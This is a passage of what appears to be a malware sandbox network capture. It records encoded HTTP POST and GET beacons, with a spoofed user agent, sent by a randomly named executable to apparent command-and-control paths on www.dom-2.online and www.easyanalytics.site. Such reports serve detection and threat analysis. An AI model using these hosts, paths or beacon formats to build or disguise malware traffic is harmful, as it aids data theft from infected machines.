                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 44 56 37 32 51 4f 4f 63 46 37 2b 6a 79 79 77 53 7a 61 36 63 7a 64 73 38 66 62 4e 73 78 69 45 45 73 47 39 34 52 72 68 76 4b 6c 34 6b 2b 6f 34 38 6a 70 57 55 56 79 43 45 39 52 56 47 7a 6a 62 4f 52 4d 6a 77 67 50 48 57 70 5a 4b 30 49 61 30 47 50 73 5a 39 46 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DV72QOOcF7+jyywSza6czds8fbNsxiEEsG94RrhvKl4k+o48jpWUVyCE9RVGzjbORMjwgPHWpZK0Ia0GPsZ9FQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                      Sep 13, 2024 12:29:01.458409071 CEST | 567 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjEyZWU3ZGUtZDgxNC00Yjk4LTlhZWItNmJkOGNmYTVkMGY1IiwicGFnZV90aW1lIjoxNzI2MjIzMz


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      22 | 192.168.2.4 | 50423 | 199.59.243.226 | 80 | 3120 | C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 13, 2024 12:29:03.568825006 CEST | 762 | OUT | POST /m409/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.dom-2.online
                      Origin: http://www.dom-2.online
                      Content-Length: 225
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.dom-2.online/m409/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 69 69 37 58 73 74 61 4d 6f 46 71 6a 69 7a 6c 75 72 77 76 56 75 39 45 44 7a 45 5a 30 7a 52 4a 4f 70 6c 71 49 68 34 72 78 74 69 6a 65 6a 30 67 55 42 6a 61 74 6c 72 71 2b 6c 6e 4f 6d 2b 50 30 33 6f 71 63 36 46 50 69 4d 35 57 56 44 4b 6e 58 62 58 50 54 39 4c 46 73 66 42 53 2f 6c 4a 43 66 49 45 33 42 6f 79 47 53 65 55 75 63 38 48 65 51 52 36 57 45 77 7a 34 4b 47 79 4d 70 43 61 38 34 7a 52 70 57 55 71 62 35 4f 71 62 37 46 79 58 5a 62 64 4c 4b 30 6f 70 65 67 68 32 57 47 57 33 61 72 74 74 75 74 30 43 78 75 4e 51 63 54 42 70 68 77 41 46 7a 69 63 2b 78 6d 4b 66 6c 75 44 53 6d 73 33 35 70 53 71 73 37 57 54 50 52 68 6e 76 61 34 6a 57 78 33 64 56 73 3d
                      Data Ascii: MtXH8dRH=ii7XstaMoFqjizlurwvVu9EDzEZ0zRJOplqIh4rxtijej0gUBjatlrq+lnOm+P03oqc6FPiM5WVDKnXbXPT9LFsfBS/lJCfIE3BoyGSeUuc8HeQR6WEwz4KGyMpCa84zRpWUqb5Oqb7FyXZbdLK0opegh2WGW3arttut0CxuNQcTBphwAFzic+xmKfluDSms35pSqs7WTPRhnva4jWx3dVs=
                      Sep 13, 2024 12:29:04.037043095 CEST | 1236 | IN | HTTP/1.1 200 OK
                      date: Fri, 13 Sep 2024 10:29:03 GMT
                      content-type: text/html; charset=utf-8
                      content-length: 1114
                      x-request-id: 521b59ae-b183-4f2e-b5d3-3454b5fa009d
                      cache-control: no-store, max-age=0
                      accept-ch: sec-ch-prefers-color-scheme
                      critical-ch: sec-ch-prefers-color-scheme
                      vary: sec-ch-prefers-color-scheme
                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DV72QOOcF7+jyywSza6czds8fbNsxiEEsG94RrhvKl4k+o48jpWUVyCE9RVGzjbORMjwgPHWpZK0Ia0GPsZ9FQ==
                      set-cookie: parking_session=521b59ae-b183-4f2e-b5d3-3454b5fa009d; expires=Fri, 13 Sep 2024 10:44:03 GMT; path=/
                      connection: close
                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 44 56 37 32 51 4f 4f 63 46 37 2b 6a 79 79 77 53 7a 61 36 63 7a 64 73 38 66 62 4e 73 78 69 45 45 73 47 39 34 52 72 68 76 4b 6c 34 6b 2b 6f 34 38 6a 70 57 55 56 79 43 45 39 52 56 47 7a 6a 62 4f 52 4d 6a 77 67 50 48 57 70 5a 4b 30 49 61 30 47 50 73 5a 39 46 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DV72QOOcF7+jyywSza6czds8fbNsxiEEsG94RrhvKl4k+o48jpWUVyCE9RVGzjbORMjwgPHWpZK0Ia0GPsZ9FQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                      Sep 13, 2024 12:29:04.037086010 CEST | 567 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTIxYjU5YWUtYjE4My00ZjJlLWI1ZDMtMzQ1NGI1ZmEwMDlkIiwicGFnZV90aW1lIjoxNzI2MjIzMz


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      23 | 192.168.2.4 | 50424 | 199.59.243.226 | 80 | 3120 | C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 13, 2024 12:29:06.139482975 CEST | 10844 | OUT | POST /m409/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.dom-2.online
                      Origin: http://www.dom-2.online
                      Content-Length: 10305
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.dom-2.online/m409/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 69 69 37 58 73 74 61 4d 6f 46 71 6a 69 7a 6c 75 72 77 76 56 75 39 45 44 7a 45 5a 30 7a 52 4a 4f 70 6c 71 49 68 34 72 78 74 69 62 65 6a 42 73 55 54 41 79 74 6d 72 71 2b 35 33 4f 6e 2b 50 30 51 6f 71 45 2b 46 4f 66 37 35 56 39 44 4b 46 66 62 56 2b 54 39 41 46 73 66 63 69 2f 31 4e 43 66 6e 45 32 78 73 79 47 69 65 55 75 63 38 48 66 67 52 39 48 45 77 78 34 4b 48 7a 4d 70 4f 4e 73 35 63 52 74 36 45 71 59 56 34 71 72 62 46 79 33 70 62 52 64 2b 30 79 70 66 47 6d 32 58 44 57 33 47 6b 74 73 43 51 30 44 56 55 4e 57 67 54 44 6f 45 59 62 46 6a 75 47 34 31 70 4b 4e 41 4d 50 54 53 57 35 37 63 76 36 75 58 79 46 2b 55 4f 6d 66 66 61 33 47 64 37 42 79 74 55 55 6a 66 54 34 51 30 50 66 52 55 4f 34 46 73 52 46 61 6b 6d 6d 49 4f 73 56 43 34 2b 41 33 64 67 68 6a 77 63 78 4d 42 75 4f 51 72 58 39 6e 66 53 2b 50 50 36 32 2f 68 4c 53 58 7a 2b 38 37 2f 58 56 4b 53 5a 39 4c 46 78 75 69 4a 47 45 35 34 2b 56 76 67 6e 6f 32 51 41 4c 4d 67 5a 42 4e 70 41 57 4c 38 68 47 4f 33 5a 56 65 53 6c 56 38 78 6f 48 [TRUNCATED]
                      Data Ascii: MtXH8dRH=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 [TRUNCATED]
                      Sep 13, 2024 12:29:06.625369072 CEST | 1236 | IN | HTTP/1.1 200 OK
                      date: Fri, 13 Sep 2024 10:29:06 GMT
                      content-type: text/html; charset=utf-8
                      content-length: 1114
                      x-request-id: 91606f27-367d-4a06-9820-4cd9b0680512
                      cache-control: no-store, max-age=0
                      accept-ch: sec-ch-prefers-color-scheme
                      critical-ch: sec-ch-prefers-color-scheme
                      vary: sec-ch-prefers-color-scheme
                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DV72QOOcF7+jyywSza6czds8fbNsxiEEsG94RrhvKl4k+o48jpWUVyCE9RVGzjbORMjwgPHWpZK0Ia0GPsZ9FQ==
                      set-cookie: parking_session=91606f27-367d-4a06-9820-4cd9b0680512; expires=Fri, 13 Sep 2024 10:44:06 GMT; path=/
                      connection: close
                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 44 56 37 32 51 4f 4f 63 46 37 2b 6a 79 79 77 53 7a 61 36 63 7a 64 73 38 66 62 4e 73 78 69 45 45 73 47 39 34 52 72 68 76 4b 6c 34 6b 2b 6f 34 38 6a 70 57 55 56 79 43 45 39 52 56 47 7a 6a 62 4f 52 4d 6a 77 67 50 48 57 70 5a 4b 30 49 61 30 47 50 73 5a 39 46 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DV72QOOcF7+jyywSza6czds8fbNsxiEEsG94RrhvKl4k+o48jpWUVyCE9RVGzjbORMjwgPHWpZK0Ia0GPsZ9FQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                      Sep 13, 2024 12:29:06.625754118 CEST | 567 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTE2MDZmMjctMzY3ZC00YTA2LTk4MjAtNGNkOWIwNjgwNTEyIiwicGFnZV90aW1lIjoxNzI2MjIzMz


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      24 | 192.168.2.4 | 50425 | 199.59.243.226 | 80 | 3120 | C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 13, 2024 12:29:08.675864935 CEST | 482 | OUT | GET /m409/?MtXH8dRH=vgT3vdiL6XmHyQpuqznGmu4w6V9vwAtJ/QiZ74rQqCLiqTobayGplqDkxFD969c96YoECNzKpiIWNF3RdO36GE5+Hjm0BUXOD0JGo2GVPeYBG+tw9V1xstM=&EB04T=0hSTF8phw HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Host: www.dom-2.online
                      Connection: close
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Sep 13, 2024 12:29:09.136223078 CEST | 1236 | IN | HTTP/1.1 200 OK
                      date: Fri, 13 Sep 2024 10:29:08 GMT
                      content-type: text/html; charset=utf-8
                      content-length: 1466
                      x-request-id: 185ac257-4d2f-4180-9c07-f4ee179decac
                      cache-control: no-store, max-age=0
                      accept-ch: sec-ch-prefers-color-scheme
                      critical-ch: sec-ch-prefers-color-scheme
                      vary: sec-ch-prefers-color-scheme
                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_tlTFSKQnvFrupX7Iw0xonjcPEimuv4JY8Sd1MbUieALKOH/WxGWFz3ABg32Q5o/cIFfb9ijhgPcKzZTxw9L3KQ==
                      set-cookie: parking_session=185ac257-4d2f-4180-9c07-f4ee179decac; expires=Fri, 13 Sep 2024 10:44:09 GMT; path=/
                      connection: close
                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 74 6c 54 46 53 4b 51 6e 76 46 72 75 70 58 37 49 77 30 78 6f 6e 6a 63 50 45 69 6d 75 76 34 4a 59 38 53 64 31 4d 62 55 69 65 41 4c 4b 4f 48 2f 57 78 47 57 46 7a 33 41 42 67 33 32 51 35 6f 2f 63 49 46 66 62 39 69 6a 68 67 50 63 4b 7a 5a 54 78 77 39 4c 33 4b 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_tlTFSKQnvFrupX7Iw0xonjcPEimuv4JY8Sd1MbUieALKOH/WxGWFz3ABg32Q5o/cIFfb9ijhgPcKzZTxw9L3KQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                      Sep 13, 2024 12:29:09.136499882 CEST | 919 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMTg1YWMyNTctNGQyZi00MTgwLTljMDctZjRlZTE3OWRlY2FjIiwicGFnZV90aW1lIjoxNzI2MjIzMz


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      25 | 192.168.2.4 | 50426 | 162.241.226.190 | 80 | 3120 | C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 13, 2024 12:29:14.322768927 CEST | 760 | OUT | POST /21tc/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.easyanalytics.site
                      Origin: http://www.easyanalytics.site
                      Content-Length: 205
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.easyanalytics.site/21tc/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 51 62 46 42 4e 55 68 47 6f 39 2f 6e 57 64 50 78 47 52 48 7a 65 5a 5a 32 4c 77 32 6b 6c 61 6b 6d 33 64 70 31 30 46 62 73 6e 71 2f 44 77 4c 42 57 6c 4a 44 63 4e 39 5a 61 57 66 79 7a 77 4a 47 42 6f 30 68 39 52 2b 79 44 31 71 4b 41 72 30 71 6c 58 53 48 4a 32 6c 71 64 55 32 75 4c 4b 47 79 66 79 65 44 6e 63 49 72 34 33 79 35 2f 5a 45 2f 54 67 59 2f 32 32 46 63 33 76 62 71 66 4d 38 4d 33 33 34 44 33 59 43 4a 6f 4a 75 39 31 4b 36 63 67 62 5a 78 79 75 69 32 50 57 38 30 59 56 77 74 53 31 4d 31 30 56 56 69 51 7a 34 34 45 6b 43 66 48 34 39 74 43 58 5a 4d 65 54 63 59 71 67 63 62 4d 75 41 3d 3d
                      Data Ascii: MtXH8dRH=QbFBNUhGo9/nWdPxGRHzeZZ2Lw2klakm3dp10Fbsnq/DwLBWlJDcN9ZaWfyzwJGBo0h9R+yD1qKAr0qlXSHJ2lqdU2uLKGyfyeDncIr43y5/ZE/TgY/22Fc3vbqfM8M334D3YCJoJu91K6cgbZxyui2PW80YVwtS1M10VViQz44EkCfH49tCXZMeTcYqgcbMuA==
                      Sep 13, 2024 12:29:14.920083046 CEST | 479 | IN | HTTP/1.1 404 Not Found
                      Date: Fri, 13 Sep 2024 10:29:14 GMT
                      Server: Apache
                      Content-Length: 315
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      26 | 192.168.2.4 | 50427 | 162.241.226.190 | 80 | 3120 | C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Sep 13, 2024 12:29:16.876532078 CEST | 780 | OUT | POST /21tc/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate
                      Host: www.easyanalytics.site
                      Origin: http://www.easyanalytics.site
                      Content-Length: 225
                      Content-Type: application/x-www-form-urlencoded
                      Cache-Control: no-cache
                      Connection: close
                      Referer: http://www.easyanalytics.site/21tc/
                      User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                      Data Raw: 4d 74 58 48 38 64 52 48 3d 51 62 46 42 4e 55 68 47 6f 39 2f 6e 58 39 2f 78 48 79 66 7a 59 35 5a 70 58 67 32 6b 2f 71 6b 69 33 64 6c 31 30 47 58 38 6e 5a 62 44 78 72 78 57 6d 4c 72 63 4b 39 5a 61 5a 2f 79 32 30 4a 47 30 6f 30 6c 44 52 37 4b 44 31 71 65 41 72 78 57 6c 58 67 76 57 33 31 71 6c 4d 47 75 4a 55 32 79 66 79 65 44 6e 63 4d 44 47 33 7a 64 2f 5a 31 76 54 76 64 4c 31 71 31 63 34 73 62 71 66 49 38 4d 4e 33 34 44 42 59 43 34 2f 4a 74 46 31 4b 37 73 67 61 49 78 78 35 53 32 46 4c 73 31 55 52 79 30 5a 73 50 41 48 52 58 4f 77 7a 71 38 49 73 6b 4f 64 70 4d 4d 56 46 5a 6f 74 4f 62 52 65 74 66 6d 46 31 44 70 41 2f 31 4e 42 59 59 53 6b 4e 48 57 49 6d 63 47 6c 59 59 63 3d
                      Data Ascii: MtXH8dRH=QbFBNUhGo9/nX9/xHyfzY5ZpXg2k/qki3dl10GX8nZbDxrxWmLrcK9ZaZ/y20JG0o0lDR7KD1qeArxWlXgvW31qlMGuJU2yfyeDncMDG3zd/Z1vTvdL1q1c4sbqfI8MN34DBYC4/JtF1K7sgaIxx5S2FLs1URy0ZsPAHRXOwzq8IskOdpMMVFZotObRetfmF1DpA/1NBYYSkNHWImcGlYYc=
                      Sep 13, 2024 12:29:17.468024015 CEST | 479 | IN | HTTP/1.1 404 Not Found
                      Date: Fri, 13 Sep 2024 10:29:17 GMT
                      Server: Apache
                      Content-Length: 315
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
